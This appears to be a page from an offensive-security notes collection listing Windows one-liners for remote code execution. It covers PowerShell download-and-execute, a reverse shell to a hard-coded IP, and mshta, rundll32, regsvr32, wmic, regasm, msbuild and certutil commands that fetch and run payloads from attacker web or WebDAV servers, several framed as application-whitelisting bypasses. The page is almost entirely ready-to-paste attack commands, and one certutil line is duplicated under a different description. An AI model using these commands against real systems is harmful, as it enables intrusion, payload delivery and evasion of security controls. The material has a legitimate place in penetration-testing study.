Oneliners for Code Execution

Last updated 5 years ago

Oneliners for Code Execution

PowerShell

powershell.exe iex (iwr http://172.16.100.211/Invoke-PowerT.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.211 -Port 443

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex

But you can also call the payload directly from a WebDAV server:

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Cmd

Check out the great work by Arno0x with Invoke-EmbedInBatch.ps1 script (heavily inspired by @xorrior work), and see that you can easily execute any binary, dll, script:

cmd.exe /k < \\webdavserver\folder\batchfile.txt

Cscript/Wscript

cscript //E:jscript \\webdavserver\folder\payload.txt

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))

As seen in the koadic framework mshta accepts a URL as an argument to execute an HTA file:

mshta http://webserver/payload.hta

Rundll32

rundll32 \\webdavserver\folder\payload.dll,entrypoint

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:
http://webserver/payload.sct");window.close();

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Regasm/Regsvc

Application whitelisting bypass techniques discovered by @subTee. You need to create a specific DLL (can be written in .Net/C#) that will expose the proper interfaces, and you can then call it over WebDAV:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u 
\\webdavserver\folder\payload.dll

Regsvr32

Another one from @subTee. This ones requires a slightly different scriptlet from the mshta one above. First option:

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll

Second option using UNC/WebDAV:

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Odbcconf

To be noted is that the DLL file doesn’t need to have the .dll extension. It can be downloaded using UNC/WebDAV:

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

Certutil

Great work by @subTee for discovering this:

certutil -urlcache -split -f http://webserver/payload payload

Now combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

You could simply deliver an executable:

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

This information was referenced from:

PreviousTunneling NextPython for Exfil